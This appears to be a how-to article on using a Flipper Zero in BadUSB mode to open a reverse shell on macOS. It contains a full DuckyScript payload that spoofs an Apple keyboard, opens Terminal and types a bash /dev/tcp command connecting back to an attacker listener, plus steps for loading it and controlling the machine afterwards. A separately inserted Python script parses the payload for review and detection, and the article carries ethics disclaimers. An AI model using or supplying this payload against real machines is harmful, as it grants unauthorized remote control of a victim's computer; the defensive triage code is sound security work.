
Learn how to use Flipper Zero to run a Reverse Shell on macOS. Step-by-step instructions on creating a DuckyScript, configuring Netcat, and running BadUSB to scan your system for vulnerabilities.
Using Flipper Zero, a compact 12-line DuckyScript text file, and a remote listener on an Ubuntu server, you can open a reverse shell on a computer running macOS Ventura.
Reverse Shell on macOS is used for a variety of tasks, including cybersecurity testing, remote system administration, and information security training. In the field of pentesting, Reverse Shell helps to identify weaknesses in security systems and assess their reliability. However, it is worth remembering that the use of such technologies on other people’s or corporate devices without permission is a violation of law and ethics. All actions should be performed exclusively within the legal framework.
Flipper Zero is a universal portable device designed to interact with digital systems. It has a wide range of functions for analyzing and modifying various types of wireless signals and protocols.
Flipper Zero’s main capabilities include working with RFID, radio frequency signals, infrared, and other types of wireless communication. Flexible program code allows you to adapt the device to the user’s needs and expand its functionality for specific tasks.
In BadUSB mode, devices like Flipper Zero run payloads written in DuckyScript, a simple scripting language that automates keystrokes on a target computer.
The main resource for developing and finding DuckyScript examples is the official Hak5 website, which provides documentation and examples for implementing various functions.
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
The IP address 10.10.10.157 and port 4444 need to be changed to the IP address and port of your server. After that, the file should be saved as rev_shell_macos.txt.
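When reviewing a BadUSB text file before it is run on a test machine, it helps to summarise what the file will do without executing it. The following is an added example, not code from the original article or from Hak5 or Flipper: it statically parses the payload shown above and reports the USB ID line, the total scripted delay, the typed strings and any /dev/tcp callback target. The function name triage_payload and the report fields are hypothetical.

```python
import re

# Payload text copied from the article; the address and port are its sample values.
SAMPLE_PAYLOAD = """\
ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 200
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1
DELAY 1000
ENTER
DELAY 1000
"""

# Bash pseudo-device for outbound sockets: /dev/tcp/<host>/<port>
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/([A-Za-z0-9.\-]+)/(\d{1,5})")
# Flipper BadUSB "ID vid:pid Manufacturer:Product" line
USB_ID = re.compile(r"^ID\s+([0-9a-fA-F]{4}):([0-9a-fA-F]{4})(?:\s+(.*))?$")


def triage_payload(text):  # hypothetical helper name
    """Summarise a DuckyScript file for review without executing anything."""
    report = {"usb_id": None, "label": None, "delay_ms": 0,
              "typed": [], "callbacks": [], "findings": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("REM"):
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "ID" and (m := USB_ID.match(line)):
            report["usb_id"] = f"{m.group(1).lower()}:{m.group(2).lower()}"
            report["label"] = m.group(3)
            report["findings"].append("sets a custom USB vendor:product ID")
        elif cmd == "DELAY" and arg.strip().isdigit():
            report["delay_ms"] += int(arg)
        elif cmd == "STRING":
            report["typed"].append(arg)
            for host, port in DEV_TCP.findall(arg):
                report["callbacks"].append((host, int(port)))
            if re.search(r"\b(?:ba|z)?sh\s+-i\b", arg) and DEV_TCP.search(arg):
                report["findings"].append("interactive shell redirected to a network socket")
    return report

if __name__ == "__main__":
    print(triage_payload(SAMPLE_PAYLOAD))
```

The same /dev/tcp pattern can be matched against shell history or process command-line telemetry on the macOS host to spot this payload after the fact.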
It is worth noting that the Flipper Zero badusb directory does not support subdirectories. Therefore, if you plan to use multiple payloads for different operating systems, it is a good idea to follow a clear naming convention for convenience.
If qFlipper is not yet installed, go to the official Flipper Zero update page and download the installer that matches your operating system. After downloading, install it according to the instructions on the site.
Open the qFlipper app and select the folder icon highlighted in red in the screenshot.
Select and double-click the SD card to view the contents.
Disconnect Flipper Zero from your computer after copying the file.
Now that the Netcat listener is ready and waiting for an incoming connection, we can proceed with the BadUSB attack.
The hardest part is done. The BadUSB file reverse_shell_macos.txt is written, moved to Flipper Zero, and the Netcat listener waits for a connection. Now we go to the “Bad USB” menu.
The BadUSB script execution process can be monitored in the main window of the Flipper Zero device. Once the execution status reaches 100%, the payload has finished running. At this point, the Flipper Zero can be safely disconnected from the USB port.
While the DuckyScript is running, you can watch the exploit launch on your iMac screen. At the same time, the Netcat listener on your Ubuntu server shows the results of a successful connection.
Once you have successfully launched the Reverse Shell, you have access to your macOS system. You can now control your computer as if you were using a physical keyboard, working through the Bash shell from the Linux server.
Through the Reverse Shell, you can use the same basic commands as on Linux to control macOS. Below are examples of such commands:
whoami — specifies the username under which the connection is made.
pwd — shows the current working directory.
ls — lists the files and folders in the current directory.
cd — is used to move between directories.
These commands allow you to navigate the file system and interact with the operating system as if it were a local terminal.
Understanding how Flipper Zero works as a BadUSB device allows you to create your own scripts for task automation or security testing. You can use:
The official Hak5 website, which provides documentation and examples of DuckyScript scripts.
GitHub repositories containing ready-made scripts and useful tools for further adaptation.
It is important to remember to follow ethical and legal norms: BadUSB should only be used on your own devices or with explicit permission. Any other actions may have legal and moral consequences.